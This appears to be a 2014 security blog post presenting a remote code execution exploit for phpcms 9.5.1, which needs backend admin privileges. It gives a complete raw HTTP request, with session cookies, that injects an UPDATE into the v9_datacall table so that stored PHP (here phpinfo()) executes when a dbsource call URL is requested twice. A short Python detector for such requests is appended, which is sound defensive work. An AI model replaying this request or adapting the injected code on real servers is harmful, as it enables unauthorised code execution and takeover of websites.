phpcms 9.5.1 index.php remote code execution vulnerability (exploit tool)



More tools at: http://www.isafe.cc/
Web WAF:       http://waf.isafe.cc/
Exploitation prerequisite: phpcms backend (admin) privileges.

http://phpcms.isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=admin&c=index
Open the link above to enter the backend, then click “Modules”.

Add a data source
POST /phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=add HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://phpcms.isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=add&pc_hash=h6Po4O&type=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: phpcms.isafe.cc:2217
Content-Length: 316
Connection: Keep-Alive
Cookie: ZGdwR_admin_username=e17cVgcDAAVUAQMEVAEJAgACAF9UVwJRWQFQClZIDkgFCxU; ZGdwR_siteid=9de4BANRAgYICVYBVgVXWFBfC1QHBloHBA0IBgMG; ZGdwR_userid=798fCQdTAwQABlEHBwhQAFRbBgpQVwlQAlcCVVdU; ZGdwR_admin_email=798fCQdTAwQABlEHB1wFAFZSBloCUlQHVlMLXAcEUAsKXCVQRAJVUR5VAg; ZGdwR_sys_lang=07eaAQVTUQMFCAkHVlVXBV5VVAUMAgtWUgMNVQFIDUxQWg; PHPSESSID=hqgaqdbvncrsqbr3hr6b6uq8g0

type=1&data=update+v9_datacall+set+module%3D%27announce%27%2Caction%3D%27pc_tag%27%2Cdata%3D%27phpinfo%28%29%3B%27%2Ctype%3D%272%27+where+name%3D123%3B&name=123456&dis_type=1&template=%7Bloop+%24data+%24k+%24v%7D%0D%0A++++%3C%21--+%C4%E3%B5%C4%B4%FA%C2%EB+--%3E%0D%0A%7B%2Floop%7D&cache=&num=&dosubmit=&pc_hash=h6Po4O
Data source list
http://phpcms.isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=init&menuid=902&pc_hash=h6Po4O

http://127.0.0.1:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=call&a=get&id=10

Request the link above twice and the phpinfo() function is executed.
http://127.0.0.1:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=call&a=get&id=38
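An added detection check for the request shown above (example code written for this page, not part of the original post and not phpcms code): it parses a phpcms dbsource "add data source" POST and flags a `data` field whose SQL writes to tables, or touches v9_datacall, instead of reading. The sample body is a constructed copy of the page's payload; the list of write keywords is an assumption.

```python
"""Flag phpcms dbsource 'add data source' requests whose SQL is not read-only."""
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample: the request path and body from the write-up above,
# with the template/cache fields omitted for brevity.
SAMPLE_PATH = "/phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=add"
SAMPLE_BODY = (
    "type=1&data=update+v9_datacall+set+module%3D%27announce%27%2Caction%3D"
    "%27pc_tag%27%2Cdata%3D%27phpinfo%28%29%3B%27%2Ctype%3D%272%27+where+"
    "name%3D123%3B&name=123456&dis_type=1&dosubmit=&pc_hash=h6Po4O"
)

# Assumption: a data source is only ever expected to hold a SELECT, so any
# of these keywords in the stored SQL is worth an alert.
WRITE_KEYWORDS = re.compile(r"\b(update|insert|delete|replace|alter|drop)\b", re.I)


def is_dbsource_add(path: str) -> bool:
    """True when the request targets m=dbsource&c=data&a=add."""
    q = parse_qs(urlparse(path).query)
    return (q.get("m") == ["dbsource"] and q.get("c") == ["data"]
            and q.get("a") == ["add"])


def inspect_request(path: str, body: str) -> dict:
    """Return a verdict for one request: whether it is flagged and why."""
    if not is_dbsource_add(path):
        return {"flagged": False, "reason": "not a dbsource add request"}
    form = parse_qs(body, keep_blank_values=True)   # also URL-decodes '+' and %XX
    sql = form.get("data", [""])[0]
    reasons = []
    if WRITE_KEYWORDS.search(sql):
        reasons.append("write statement in data-source SQL")
    if "v9_datacall" in sql.lower():
        # The stored query should not rewrite the table that holds the
        # data sources themselves; the write-up above does exactly that.
        reasons.append("data-source SQL references v9_datacall")
    return {"flagged": bool(reasons), "reason": "; ".join(reasons) or "read-only"}


if __name__ == "__main__":
    print(inspect_request(SAMPLE_PATH, SAMPLE_BODY))
```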


[This entry was last edited by admin on 2014-03-11 01:10 PM]
Source: original to this site
Tags: 0day
Comments: 0 | Trackbacks: 0 | Views: 4009